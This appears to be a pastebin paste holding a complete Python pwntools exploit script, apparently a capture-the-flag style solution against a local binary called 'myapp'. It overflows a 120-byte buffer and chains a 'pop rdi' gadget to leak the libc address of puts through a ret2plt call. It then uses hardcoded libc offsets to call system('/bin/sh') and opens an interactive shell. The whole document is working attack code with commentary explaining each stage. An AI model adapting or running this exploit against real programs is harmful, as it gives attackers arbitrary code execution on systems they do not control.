Untitled

a guest, Sep 20th, 2019
from pwn import *

# Context of the exploit: Linux OS, amd64 architecture (affects p64/u64 and shellcode helpers)
context(os='linux', arch='amd64')

# Addresses taken from the target binary (no PIE, so they are fixed)
put_plt_addr = p64(0x401030)    # puts@plt
put_got_addr = p64(0x404018)    # puts@got, holds the resolved libc address after first call
main_plt_addr = p64(0x401094)   # main, so the program restarts after the leak
pop_rdi_gadget = p64(0x401090)  # "pop rdi; ret", sets the first argument

# 120 bytes of padding reach the saved return address.
# pwntools' p64() returns bytes, so the padding must be bytes as well (Python 3).
junk = b'A' * 120

# Stage 1: ret2plt. Call puts(puts@got) to leak the libc address of puts,
# then return to main so we can send a second payload.
payload = junk
payload += pop_rdi_gadget
payload += put_got_addr
payload += put_plt_addr
payload += main_plt_addr
#print(payload)

p = process("./myapp")
print(p.recvuntil(b"back?"))
#print(p.recv())  # debug: dump whatever else the program prints
p.sendline(payload)
p.recvuntil(b"\n")

# puts stops at the first NUL byte, so the leak is at most 6 bytes; pad it back to 8
leaked = u64(p.recv()[:8].strip().ljust(8, b"\x00"))
log.success("Leaked Address = " + hex(leaked))

# Offsets inside the target's libc build (from the libc used by the program)
puts_libc = 0x71910
system_libc = 0x449c0
sh_libc = 0x181519

# libc base = leaked puts address - offset of puts inside libc;
# every other libc symbol is then base + its offset
libc_base = leaked - puts_libc
system_addr = p64(libc_base + system_libc)
sh_addr = p64(libc_base + sh_libc)  # address of the "/bin/sh" string in libc

# Stage 2: ret2libc. Call system("/bin/sh").
payload2 = junk
payload2 += pop_rdi_gadget
payload2 += sh_addr
payload2 += system_addr

p.recvuntil(b"back?")
p.sendline(payload2)

p.interactive()